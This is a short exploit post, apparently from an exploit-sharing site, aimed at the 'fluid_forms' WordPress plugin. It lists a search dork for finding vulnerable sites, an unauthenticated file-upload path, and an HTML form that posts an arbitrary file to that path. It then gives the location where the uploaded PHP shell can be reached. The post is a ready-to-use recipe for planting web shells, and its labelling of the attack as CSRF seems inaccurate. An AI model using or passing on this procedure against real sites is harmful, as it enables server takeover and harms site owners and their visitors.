Assalamuallaikum Wr.Wb
- #Author: Jangene Cakep
- #Dork: inurl:fluid_forms
- #Exploit & Vulnerability: /wp-content/plugins/fluid_forms/file-upload/server/php/
- #Type: CSRF & Xampp ,Uploadify
- #Tested:Windows XP, 7, 8, Backbox
- #CMS:WordPress
CSRF:
<form method="POST" action="http://IcalSadega.com/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell Location :
/wp-content/plugins/fluid_forms/file-upload/server/php/files/IcalSadega.php